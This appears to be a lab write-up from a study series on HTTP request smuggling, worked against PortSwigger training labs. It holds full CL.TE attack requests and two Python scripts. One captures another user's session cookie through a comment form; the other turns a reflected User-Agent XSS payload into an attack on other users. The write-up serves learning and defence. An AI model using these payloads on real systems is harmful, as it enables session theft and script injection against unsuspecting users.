HTTP Request Smuggling Study (3): Exploiting HTTP Request Smuggling

HTTP Request Smuggling Study (1): Introduction to HTTP Request Smuggling
HTTP Request Smuggling Study (2): Common HTTP Request Smuggling Techniques
HTTP Request Smuggling Study (3): Exploiting HTTP Request Smuggling

Lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

Taking the CL.TE variant as the example (the front end frames the request by Content-Length, the back end by Transfer-Encoding), here is a simple demonstration of exploitation.

Stealing other users' request data through the comment form

Post any comment, capture the request, and modify it as follows:
POST / HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Connection: close
Content-Length: 886
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Connection: close
Content-Length: 1020
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG

csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=&comment=

The Content-Length of the smuggled request (1020 here) has to be tuned to the situation before the cookie becomes visible: it must be large enough to reach past the victim's Cookie header, but no larger than the smuggled form body plus the victim's entire request, otherwise the back end keeps waiting for bytes that never arrive and the request times out. The outer Content-Length (886) must cover the whole payload, from the '0' chunk to the end of the smuggled request, so that the front end forwards all of it.
When this is submitted, the front end (trusting Content-Length) forwards everything, while the back end (trusting Transfer-Encoding) stops at the '0' chunk; everything after it stays in the connection buffer and is prepended to the next request on that connection.
The next request is therefore reassembled on the back end as:

POST /post/comment HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
.....
csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=
&comment=POST /post/comment HTTP/1.1
xxxx

comment= is the comment body, so whatever follows it, i.e. the beginning of the next request on that connection, is stored and displayed as the comment.

Now send the modified request, then go back to the comment form and submit anything.

An error is shown; refresh the page.

The next user's request shows up in the comment, including their Cookie header.
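The flow above, as an added example that is not code from the original post: it rebuilds the smuggled request with the same headers as the capture, computes the outer Content-Length (which comes out at 886, as in the post), and then simulates a front end that trusts Content-Length and a back end that trusts Transfer-Encoding so you can see the next request land in comment=. The victim request, the session value and the helper names are constructed for the demo and not taken from the lab.

```python
# Added example, not code from the original post: build the CL.TE attack request with a
# correct outer Content-Length, then simulate how a front end that trusts Content-Length
# and a back end that trusts Transfer-Encoding split the stream, so the next user's request
# is appended to comment=. VICTIM below is constructed for the demo, not a real capture.
CRLF = "\r\n"
HOST = "ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net"  # lab host from the post
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36")
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,"
          "image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
VICTIM_SESSION = "VICTIMSESSIONVALUE00000000000000"  # constructed, stands in for another user's cookie


def serialize(request_line, headers, body=""):
    """Join request line, header lines and body with CRLF line endings."""
    return request_line + CRLF + CRLF.join(headers) + CRLF + CRLF + body


def smuggled_prefix(smuggled_cl):
    """The request left queued on the back end (headers as in the post). Its Content-Length
    decides how many bytes of the *next* request are stored as the comment."""
    headers = [
        "Host: " + HOST, "Connection: close", "Content-Length: %d" % smuggled_cl,
        "Cache-Control: max-age=0", "Upgrade-Insecure-Requests: 1",
        "Origin: https://" + HOST, "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: " + UA, "Accept: " + ACCEPT,
        "Referer: https://" + HOST + "/post?postId=4",
        "Accept-Encoding: gzip, deflate", "Accept-Language: zh-CN,zh;q=0.9",
        "Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG",
    ]
    body = ("csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111"
            "&email=test%40163.com&website=&comment=")
    return serialize("POST /post/comment HTTP/1.1", headers, body)


def cl_te_attack(prefix):
    """Outer request: the chunked body ends at once ('0\\r\\n\\r\\n') for the back end, while
    Content-Length covers the whole payload so the front end forwards all of it.
    Returns (raw request, outer Content-Length value)."""
    body = "0" + CRLF + CRLF + prefix
    headers = ["Host: " + HOST, "Connection: close",
               "Content-Type: application/x-www-form-urlencoded",
               "Content-Length: %d" % len(body), "Transfer-Encoding: chunked"]
    return serialize("POST / HTTP/1.1", headers, body), len(body)


def backend_take_chunked(stream):
    """Back end honouring Transfer-Encoding: consume one chunked request, return (request, leftover)."""
    pos = stream.index(CRLF + CRLF) + 4
    while True:
        eol = stream.index(CRLF, pos)
        size = int(stream[pos:eol].split(";")[0], 16)
        pos = eol + 2
        if size == 0:                          # last chunk: skip the (empty) trailer line
            pos = stream.index(CRLF, pos) + 2
            return stream[:pos], stream[pos:]
        pos += size + 2                        # chunk data plus its trailing CRLF


def backend_take_cl(stream):
    """Back end reading a Content-Length framed request from its receive buffer.
    Returns (request, leftover), or None while the body is incomplete (it keeps waiting)."""
    if CRLF + CRLF not in stream:
        return None
    head, rest = stream.split(CRLF + CRLF, 1)
    cl = 0
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            cl = int(value)
    if len(rest) < cl:
        return None
    return head + CRLF + CRLF + rest[:cl], rest[cl:]


def captured_comment(smuggled_cl, victim_request):
    """Run the whole flow; return the comment text the back end would store, or None when the
    smuggled Content-Length asks for more bytes than the victim's request supplies."""
    attack, _ = cl_te_attack(smuggled_prefix(smuggled_cl))
    _, leftover = backend_take_chunked(attack)           # front end forwarded the whole body
    taken = backend_take_cl(leftover + victim_request)   # victim's bytes follow the prefix
    if taken is None:
        return None
    return taken[0].split(CRLF + CRLF, 1)[1].split("comment=", 1)[1]


def cl_to_capture_through(victim_request, header_name="Cookie"):
    """Smuggled Content-Length that ends the stored comment right after the victim's
    `header_name` line: form prefix length plus the offset of that line's end."""
    form = smuggled_prefix(0).split(CRLF + CRLF, 1)[1]
    end = victim_request.index(CRLF, victim_request.index(header_name + ":")) + 2
    return len(form) + end


# Constructed victim request: Cookie placed early so modest CL values already reach it.
VICTIM = serialize("GET /post?postId=4 HTTP/1.1",
                   ["Host: " + HOST, "Cookie: session=" + VICTIM_SESSION,
                    "User-Agent: " + UA, "Accept: " + ACCEPT, "Connection: close"])

if __name__ == "__main__":
    print("outer Content-Length:", cl_te_attack(smuggled_prefix(1020))[1])  # 886, as in the post
    cl = cl_to_capture_through(VICTIM)
    print("stored comment with CL=%d:\n%s" % (cl, captured_comment(cl, VICTIM)))
    print("CL=1020 against this shorter victim:", captured_comment(1020, VICTIM))  # None: back end hangs
```

Running it shows the two failure modes the tuning caveat is about: with a Content-Length that ends just past the victim's Cookie line the stored comment is the victim's request up to and including that header, while 1020 against this (shorter, constructed) victim request returns None, which on a real target is the back end waiting for more body and the request timing out.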

Lab:


The page has a hidden input whose value is the User-Agent header.

Try changing the User-Agent to insert an XSS payload.
The JavaScript runs, but this is the classic self-XSS: only the sender of that request sees it.

Use HTTP request smuggling to turn it into XSS against other users: smuggle a request that carries the payload in its User-Agent, so that the next user's request on that connection is glued onto it and the response with the reflected payload is returned to that user.



After submitting, refresh any page to trigger the XSS.
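The same CL.TE wrapper applied to the reflected User-Agent, as an added example that is not code from the original post. The request path, the payload and the victim request are assumptions for the demo (the post gives no lab URL or payload); the point it makes is that the smuggled request's Content-Length only needs to exceed its own tiny body, so the first few bytes of the victim's request are consumed as that body and the back end answers the smuggled GET first, which the front end then hands to the victim.

```python
# Added example, not code from the original post: the same CL.TE wrapper, with the smuggled
# request now a GET whose User-Agent carries the payload. Path, payload and the victim request
# are assumptions for the demo; the post only says a hidden input reflects the User-Agent.
CRLF = "\r\n"
HOST = "ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net"  # host reused from the post
PAYLOAD = 'a"/><script>alert(document.cookie)</script>'  # assumed: breaks out of the hidden input's value=""


def serialize(request_line, headers, body=""):
    """Join request line, header lines and body with CRLF line endings."""
    return request_line + CRLF + CRLF.join(headers) + CRLF + CRLF + body


def xss_prefix(path="/post?postId=4", body="x=1", extra_cl=5):
    """Smuggled GET reflecting PAYLOAD. Its Content-Length exceeds its own body by extra_cl,
    so the back end swallows that many bytes of the victim's request as this GET's body and
    answers *this* request first; the front end delivers that answer to the victim."""
    headers = ["Host: " + HOST, "User-Agent: " + PAYLOAD,
               "Content-Type: application/x-www-form-urlencoded",
               "Content-Length: %d" % (len(body) + extra_cl)]
    return serialize("GET %s HTTP/1.1" % path, headers, body)


def cl_te_attack(prefix):
    """Outer request: chunked body that ends immediately for the back end, with
    Content-Length covering the whole smuggled prefix for the front end."""
    body = "0" + CRLF + CRLF + prefix
    headers = ["Host: " + HOST, "Connection: close",
               "Content-Type: application/x-www-form-urlencoded",
               "Content-Length: %d" % len(body), "Transfer-Encoding: chunked"]
    return serialize("POST / HTTP/1.1", headers, body), len(body)


def victim_view(prefix, victim_request):
    """What the back end sees once the victim's request arrives on the poisoned connection:
    (bytes of the victim's request swallowed as the smuggled GET's body, mangled remainder),
    or None if the victim's request is too short for the smuggled Content-Length (back end waits)."""
    head, own_body = prefix.split(CRLF + CRLF, 1)
    cl = next(int(line.split(":", 1)[1]) for line in head.split(CRLF)
              if line.lower().startswith("content-length:"))
    need = cl - len(own_body)
    if len(victim_request) < need:
        return None
    return victim_request[:need], victim_request[need:]


if __name__ == "__main__":
    raw, outer_cl = cl_te_attack(xss_prefix())
    print(raw)
    # Constructed victim request, not a real capture.
    victim = serialize("GET /post?postId=4 HTTP/1.1", ["Host: " + HOST, "Cookie: session=VICTIM"])
    print(victim_view(xss_prefix(), victim))
```

A small extra_cl is what makes this reliable: the back end only needs a handful of the victim's bytes to complete the smuggled GET, so practically any following request will do, whereas a large value would leave it waiting just like an oversized Content-Length in the comment-stealing case. Which user receives the response is still whoever's request comes next on that back-end connection.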

Overall the exploit is quite limited: which user gets hit is pure luck, since the smuggled request is glued onto whichever request happens to arrive next on that back-end connection.
